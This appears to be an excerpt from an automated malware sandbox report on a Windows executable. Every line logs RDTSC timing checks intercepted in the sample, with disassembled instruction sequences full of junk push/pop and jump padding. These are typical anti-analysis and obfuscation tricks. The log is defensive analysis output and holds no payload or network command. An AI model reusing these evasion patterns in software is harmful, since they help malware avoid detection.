                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3605F2 second address: 3605F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3605F6 second address: 360616 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jp 00007F4688C1B766h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4688C1B772h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 360D8E second address: 360D92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 360D92 second address: 360DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F4688C1B766h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 32A529 second address: 32A52D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36101E second address: 361028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F4688C1B766h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 361028 second address: 361030 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 361030 second address: 361038 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 361038 second address: 36103C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3612BA second address: 3612C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3612C0 second address: 3612C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36384F second address: 363855 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 363855 second address: 363898 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jo 00007F4688C929E4h 0x00000012 pushad 0x00000013 jnl 00007F4688C929D6h 0x00000019 jo 00007F4688C929D6h 0x0000001f popad 0x00000020 mov eax, dword ptr [eax] 0x00000022 jmp 00007F4688C929E4h 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b push esi 0x0000002c push eax 0x0000002d push edx 0x0000002e jl 00007F4688C929D6h 0x00000034 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36215D second address: 362161 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3628A6 second address: 3628AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 364CDD second address: 364CE3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 364CE3 second address: 364CE8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 364CE8 second address: 364CF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 364CF1 second address: 364CF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 364CF7 second address: 364CFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36BFFC second address: 36C000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36C000 second address: 36C004 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36C746 second address: 36C769 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4688C929D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F4688C929E9h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36C8CA second address: 36C8DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F4688C1B778h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36C8DA second address: 36C8EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C929DCh 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36C8EE second address: 36C8F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36C8F4 second address: 36C916 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 jnl 00007F4688C929D6h 0x0000000f pop edi 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 jbe 00007F4688C929D6h 0x00000019 push edi 0x0000001a pop edi 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push esi 0x0000001f pop esi 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36DCD4 second address: 36DCD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36DCD8 second address: 36DCE5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4688C929D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36DF63 second address: 36DF67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36DF67 second address: 36DF6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36E068 second address: 36E086 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4688C1B766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4688C1B771h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36E5C7 second address: 36E5D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36E80C second address: 36E829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4688C1B766h 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4688C1B76Eh 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36E9F9 second address: 36E9FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36F05E second address: 36F068 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4688C1B766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36F987 second address: 36F9A2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4688C929E0h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36F9A2 second address: 36F9A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36F9A8 second address: 36F9AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36F9AC second address: 36F9B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 371F19 second address: 371F31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F4688C929E2h 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 371F31 second address: 371F56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B771h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4688C1B76Bh 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 371F56 second address: 371F60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 371F60 second address: 371F64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 371D10 second address: 371D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 371D16 second address: 371D1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 373578 second address: 37359E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4688C929E4h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f jl 00007F4688C929DCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 37359E second address: 3735A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 37578E second address: 375796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3727FB second address: 3727FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 375796 second address: 3757A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3732DF second address: 3732E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3757A4 second address: 3757A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3732E5 second address: 3732EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F4688C1B766h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 37AA49 second address: 37AA4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 37AA4E second address: 37AA73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C1B778h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 37AA73 second address: 37AA84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C929DCh 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 37AF93 second address: 37AFE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F4688C1B768h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov edi, dword ptr [ebp+122D3A74h] 0x0000002a push 00000000h 0x0000002c mov di, cx 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 jnc 00007F4688C1B776h 0x00000038 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 37BDEC second address: 37BE4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 jc 00007F4688C929EAh 0x0000000c pushad 0x0000000d jmp 00007F4688C929DCh 0x00000012 jnc 00007F4688C929D6h 0x00000018 popad 0x00000019 nop 0x0000001a add dword ptr [ebp+122D38AEh], eax 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push ebx 0x00000025 call 00007F4688C929D8h 0x0000002a pop ebx 0x0000002b mov dword ptr [esp+04h], ebx 0x0000002f add dword ptr [esp+04h], 0000001Dh 0x00000037 inc ebx 0x00000038 push ebx 0x00000039 ret 0x0000003a pop ebx 0x0000003b ret 0x0000003c cmc 0x0000003d mov bx, di 0x00000040 push 00000000h 0x00000042 or edi, 539C45E0h 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 37B149 second address: 37B14E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 37BE4C second address: 37BE51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 37B14E second address: 37B153 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3AC094 second address: 3AC099 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B2E1D second address: 3B2E27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F4688C929D6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B2E27 second address: 3B2E2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B2F62 second address: 3B2F72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C929DBh 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B3399 second address: 3B339E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B339E second address: 3B33D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DDh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F4688C929E4h 0x0000000f push edi 0x00000010 pop edi 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 jp 00007F4688C929D6h 0x0000001f pop eax 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B33D8 second address: 3B33ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4688C1B76Ch 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B33ED second address: 3B342B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E3h 0x00000007 pushad 0x00000008 jno 00007F4688C929D6h 0x0000000e jmp 00007F4688C929E5h 0x00000013 jmp 00007F4688C929DBh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B3587 second address: 3B35C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Dh 0x00000007 jnc 00007F4688C1B76Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 js 00007F4688C1B768h 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F4688C1B76Eh 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B35C0 second address: 3B35C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B35C8 second address: 3B35D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B385B second address: 3B385F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B385F second address: 3B3863 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B3863 second address: 3B3897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4688C929E8h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4688C929E4h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B39D2 second address: 3B39D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B3B89 second address: 3B3B8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B3B8F second address: 3B3B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F4688C1B77Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B3B9C second address: 3B3BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C929E1h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B3BB1 second address: 3B3BB6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B3BB6 second address: 3B3BEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C929DFh 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007F4688C929D6h 0x00000015 jmp 00007F4688C929E5h 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B3BEA second address: 3B3C05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F4688C1B766h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B3EB4 second address: 3B3EBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B3EBB second address: 3B3EC0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3BA8B1 second address: 3BA8B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3BA8B7 second address: 3BA8D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B776h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3BA8D4 second address: 3BA8E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F4688C929DEh 0x0000000b popad 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3BA8E9 second address: 3BA901 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C1B774h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3BA901 second address: 3BA910 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3BA910 second address: 3BA917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3BA917 second address: 3BA931 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C929E0h 0x00000009 jns 00007F4688C929D6h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3BA931 second address: 3BA935 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
